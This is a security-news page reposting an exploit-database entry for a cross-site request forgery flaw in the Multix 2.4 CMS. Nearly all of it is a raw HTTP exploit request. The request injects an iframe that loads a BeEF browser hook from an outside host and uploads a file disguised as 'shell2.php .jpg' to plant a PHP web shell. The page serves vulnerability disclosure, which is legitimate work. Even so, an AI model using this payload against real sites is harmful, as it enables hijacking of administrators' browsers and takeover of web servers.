Security
Headlines
HeadlinesLatestCVEs

Headline

Multix 2.4 Cross Site Request Forgery

Multix version 2.4 suffers from a cross site request forgery vulnerability.

Packet Storm
Open in Source
#vulnerability#web#windows#apple#ubuntu#linux#php#auth#chrome#webkit
# Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /admin/file/add HTTP/1.1Host: localhostContent-Length: 466Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5VeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/admin/file/addAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1;Connection: close------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_title"<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"Content-Type: imageasdasd------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="form1"------WebKitFormBoundaryE0mBtYGic6umB5Ve--

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6
Packet Storm